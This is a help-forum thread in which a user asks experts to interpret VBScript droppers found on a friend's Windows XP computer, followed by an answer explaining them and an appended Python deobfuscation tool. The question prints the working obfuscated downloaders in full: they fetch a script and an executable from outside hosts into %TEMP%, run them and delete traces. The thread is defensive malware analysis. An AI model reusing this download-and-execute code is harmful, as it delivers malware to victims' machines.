Question : Could an expert please try to interpret this VBS code

Hello experts

A friend has been seeing some unusual behaviour with her Windows XP SP3 IE7 computer over the past couple of days that I am deeply suspicious of.  I observed it happening over a VNC connection just a short time ago.

A CMD.EXE window pops up and obviously waits.
A VBS file opens in Notepad.
When Notepad is closed, the CMD window closes.

I'm pretty sure that this is a malicious script attempting to run the VBS file without specifying the program (CScript or WScript) to run it, and because I have set the default action for most "script" type file types to the "Edit" action (Notepad) rather than the "Open" one (execute script), the malicious activity is probably failing.

On the first occasion that I didn't witness, the file "yb.vbs" was opened in Notepad from the user's %TEMP% folder with the following content:

B="yb.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://jyiop.com/kr/yb.vbs",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B


I safely downloaded "http://jyiop.com/kr/yb.vbs" and saw that the contents were crudely "obfuscated" by reversing some of the parameters as shown below:

' w = sleep in ms, x = expected HTTP status, y = ADODB stream type (1 = binary), z = async flag for XMLHTTP.open (false = synchronous)
w=3000:x=200:y=1:z=false:a = "http://jyiop.com/kr/hy/_q.php?&":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):b = e.GetSpecialFolder(2) & "\exe.exe":OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA"))
' StrReverse("tcejbOmetsySeliF.gnitpircS") = "Scripting.FileSystemObject", StrReverse("PTTHLMX.2LMXSM") = "MSXML2.XMLHTTP", StrReverse("maertS.BDODA") = "ADODB.Stream"
Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS"))
On Error resume next
' GET the URL in a; on HTTP 200 the raw response bytes are written to %TEMP%\exe.exe through a binary ADODB.Stream
c.open OT, a, z:c.send()
If c.Status = x Then
u=c.ResponseBody:d.Open:d.Type = y:d.Write u:d.SaveToFile b:d.Close
End If
' StrReverse("llehS.tpircSW") = "WScript.Shell", StrReverse("sbv.by") = "yb.vbs": run exe.exe, kill wmplayer.exe, delete yb.vbs, sleep 3 s, delete exe.exe
CreateObject(StrReverse("llehS.tpircSW")).eXeC b:CreateObject(StrReverse("llehS.tpircSW")).eXeC "taskkill /F /IM wmplayer.exe":Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("sbv.by")):g.Delete:WScript.Sleep w:Set g=o.GetFile(b):g.Delete


I safely downloaded the referenced "http://jyiop.com/kr/hy/_q.php" to reveal this code:

<META  HTTP-EQUIV="Refresh" CONTENT="0; URL=../_yoyk.php">


I know that it's not always possible to get a *.php file from a server intact by normal means (ie. Make a link to it and Right-Click > Save Target As > save as *.htm file of same name) and with the proper code, so that may just be the server's response to my attempt to download the file.

Assuming the relative URL equates to:  http://jyiop.com/kr/_yoyk.php
then that resolves to http://www.google.com
I am testing this on my own system with http://www.google.co.uk as the home page, so I know that it is not just redirecting to my home page.

On the subsequent occasion that I witnessed over VNC, a command was obviously issued to run the file "uor.vbs" from the user's %TEMP% folder in a command window, and Notepad popped up containing the script:

B="uor.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://ypuii.com/k_/uor.vbs",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B


Safely downloading and opening "http://ypuii.com/k_/uor.vbs" in a text editor revealed the same as before, ie. reversed strings.

Now, I have found that "GetSpecialFolder(2)" refers to the user's %TEMP% folder, and I can see that the script is downloading the VBS file, creating a VBScript on the fly by concatenating strings and reversed strings, but I am unsure of exactly what a script like this is doing or trying to do.

I am not very conversant with VBS other than some basic usage, so the following references are a puzzle to me:

maertS.BDODA = ADOBD.Stream

c.open OT, a, z:c.send()
If c.Status = x Then
u=c.ResponseBody:d.Open:d.Type = y:d.Write u:d.SaveToFile b:d.Close


I can see as plain as day that Windows Media Player is being killed off if it is running (which it wasn't at the material times), but I wonder why a script would be doing this.

One other apparently significant issue is that I discovered a "recently typed URL" in the user's IE Address Bar drop-down list to:
http://ypuii.com/k_/zcus/efmjcg.pdf
I couldn't find that file cached anywhere on the user's computer and she can't even recall when she would have last opened a PDF file in her browser.  I saved that PDF file and, on inspection in a text editor, I can see some text content as some kind of scripted code and a reference to "JavaScript".  The following is also clear in a text editor:

/Author (MllZTgg yZ=ssA f V )
/gZ (. b LPD tv/-Xqrf4dY3M s_JUNCVZa #8l=z 96yp2x :S5Rm k o 0&uFOcj% ihwBQn E K7gATGe H?I1W)
/Title (Ng JGgG qgMpr#AZMZH?)
/Keywords (Mokomeuapaualimajsi)
/Creator (Kotefekjoesito)
/ModDate (D:20100621095906)
/Producer (820d5Deawohigejoxamogoga)

Googling just the "Creator" name "Kotefekjoesito" takes me to this page:
http://jsunpack.jeek.org/dec/go?report=c4cc162b45e937762035f286406a989f2adf2753
where it clearly shows that the file is Malicious.

I can only guess that the earlier reference in the VBScript to "ADOBD.Stream" is a reference to "Adobe", and to a stream in a maliciously crafted PDF file.  I can only assume that this was either the start of the issue, or that it was a file fetched by a malicious script, but I wouldn't have thought it would have added the URL to the recently typed URL list.  That's puzzling in itself.

Probably not a coincidence is that googling   StrReverse("maertS.BDODA")   also takes me to the "http://jsunpack.jeek.org" site with this page:
http://jsunpack.jeek.org/dec/go?report=5d7727607489f01840f34855c5664e662488962e
but it doesn't say that is malicious.

Could someone please advise me what that first script is likely to have done (or attempted to do) on the user's computer.  I would like to know where I stand, because a full system AntiVirus + RootKit scan has yielded no positive results and I cannot see any references to the VBS files in the registry.

Thanks in advance

Bill

Answer : Could an expert please try to interpret this VBS code

I am not willing to go as far as opening the websites you mentioned however, from the scripts above here is what I see...

Script 1 is creating a blank file, links to a website and downloads the content of the page and dumps it into the blank file.  This file is saved as "yb.vbs" and is supposed to execute.
-------------------------------------------------------------------
B="yb.vbs"
With CreateObject("MSXML2.XMLHTTP")
      .open "GET","http://jyiop.com/kr/yb.vbs",false        ' synchronous GET of the second-stage script
      .send()
      Set A = CreateObject("Scripting.FileSystemObject")
      Set D = A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B)   ' GetSpecialFolder(2) = %TEMP%
      D.WriteLine .responseText                                ' write the downloaded text into %TEMP%\yb.vbs
End With
D.Close
CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B   ' launch yb.vbs via its default file-type action
-------------------------------------------------------------------
Step 2: Now that the VBS file has been created and run, it tries to visit another web page, but this time saves the page content into a file called "exe.exe". This new file is saved into the user's temp folder.
The script then runs the file "exe.exe".
As you mentioned, taskkill stops Windows Media Player - why, who knows?!?!
The script then deletes the VB script that step 1 created (the script that is currently running).
There is a 3 second wait, then the file "exe.exe" is deleted.

This part;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z:c.send()
If c.Status = x Then
u=c.ResponseBody:d.Open:d.Type = y:d.Write u:d.SaveToFile b:d.Close]
is the script trying to open a file which will stream in the web page - nothing to do with Adobe.  "c.Status" - the script is waiting for the web page to be ready and fit to download. "u=c.ResponseBody" takes the web page and shoves it into a variable.  The stream is opened and the content is written into it from the variable.  The file is saved and closed.  In this script the web page/file is saved into the temp folder as "exe.exe".

The real danger is that "exe.exe" file.  Once it has been run, there is no telling what it was designed to do.

That computer is still infected with a virus.  The program "exe.exe" could have downloaded other viruses in the background to impede scans of the system.  The fact that you can see the command window open and the script attempting to run tells me there is some malicious file still lingering.

It may be time to evaluate what needs to be saved from that machine and start afresh with a re-install of Windows and applications.  It sounds dramatic but seeing as the antivirus is not detecting anything out of sorts I think you are at the point of no return.  Remember that as long as the malicious code is on there, any drive; be it USB memory stick, camera etc., can potentially contain the virus/trojan, if it was attached to the machine.
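As an added illustration (not part of the question or the answer above), the following Python script performs the deobfuscation that the answer walks through, on the yb.vbs text pasted in the question: it reverses the StrReverse() literals, splits the colon-joined statements, inlines the single-letter constants (w, x, y, z, a, OT) and lists the indicators a responder wants first (URL, COM objects, executed and deleted files). It is purely static: nothing is downloaded or executed, and the only sample embedded in it is the script quoted above.

```python
"""Static triage of the obfuscated VBScript downloader quoted in the question.

Added example, not part of the original post: it undoes the StrReverse()
trick, splits ':'-joined statements, inlines the one-letter constants and
lists the indicators, so the script can be read without ever running it.
"""
import re

# The second-stage yb.vbs exactly as pasted in the question (reversed strings intact).
SAMPLE = r'''w=3000:x=200:y=1:z=false:a = "http://jyiop.com/kr/hy/_q.php?&":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):b = e.GetSpecialFolder(2) & "\exe.exe":OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA"))
Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS"))
On Error resume next
c.open OT, a, z:c.send()
If c.Status = x Then
u=c.ResponseBody:d.Open:d.Type = y:d.Write u:d.SaveToFile b:d.Close
End If
CreateObject(StrReverse("llehS.tpircSW")).eXeC b:CreateObject(StrReverse("llehS.tpircSW")).eXeC "taskkill /F /IM wmplayer.exe":Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("sbv.by")):g.Delete:WScript.Sleep w:Set g=o.GetFile(b):g.Delete'''

STRREVERSE = re.compile(r'StrReverse\("([^"]*)"\)', re.IGNORECASE)
# A statement that only assigns a number, quoted string or boolean to a name.
CONST_ASSIGN = re.compile(r'^(\w+)\s*=\s*(\d+|"[^"]*"|true|false)$', re.IGNORECASE)


def unreverse(script: str) -> str:
    """Replace every StrReverse("...") call with the literal it evaluates to."""
    return STRREVERSE.sub(lambda m: '"' + m.group(1)[::-1] + '"', script)


def split_statements(script: str) -> list[str]:
    """Break ':'-separated VBScript statements onto separate lines,
    ignoring colons inside string literals (such as the one in http://)."""
    stmts = []
    for line in script.splitlines():
        cur, in_str = [], False
        for ch in line:
            if ch == '"':
                in_str = not in_str
            if ch == ':' and not in_str:
                stmts.append(''.join(cur).strip())
                cur = []
            else:
                cur.append(ch)
        stmts.append(''.join(cur).strip())
    return [s for s in stmts if s]


def inline_constants(stmts: list[str]) -> list[str]:
    """Substitute constants such as w/x/y/z into the statements that use them.
    Matching is case-sensitive (VBScript is not), which is enough for scripts
    that spell a name the same way everywhere; definitions are kept for reference."""
    consts = {}
    for s in stmts:
        m = CONST_ASSIGN.match(s)
        if m:
            consts[m.group(1)] = m.group(2)
    if not consts:
        return list(stmts)
    names = re.compile(r'\b(' + '|'.join(map(re.escape, consts)) + r')\b')
    out = []
    for s in stmts:
        if CONST_ASSIGN.match(s):
            out.append(s)
            continue
        parts = s.split('"')  # even indexes lie outside string literals
        for i in range(0, len(parts), 2):
            parts[i] = names.sub(lambda m: consts[m.group(1)], parts[i])
        out.append('"'.join(parts))
    return out


def analyse(script: str) -> dict:
    """Deobfuscate the script and pull out the indicators of compromise."""
    clean = unreverse(script)
    stmts = inline_constants(split_statements(clean))
    return {
        "statements": stmts,
        "urls": sorted(set(re.findall(r'https?://[^"\s]+', clean))),
        "com_objects": sorted(set(re.findall(r'CreateObject\("([^"]+)"\)', clean, re.IGNORECASE))),
        "executes": [s for s in stmts if re.search(r'\.(exec|run)\b', s, re.IGNORECASE)],
        "deletes": [s for s in stmts if re.search(r'\.delete\b', s, re.IGNORECASE)],
    }


if __name__ == "__main__":
    report = analyse(SAMPLE)
    print("== deobfuscated ==")
    print("\n".join(report["statements"]))
    for key in ("urls", "com_objects", "executes", "deletes"):
        print(f"== {key} ==")
        print("\n".join(report[key]))
```

Run it on a saved copy of any script of this family (read the file into `analyse()` instead of `SAMPLE`) and the deobfuscated listing shows at a glance the download URL, the `ADODB.Stream` binary write to `%TEMP%\exe.exe`, the two `WScript.Shell` executions and the self-deletion, which is what the answer describes in prose.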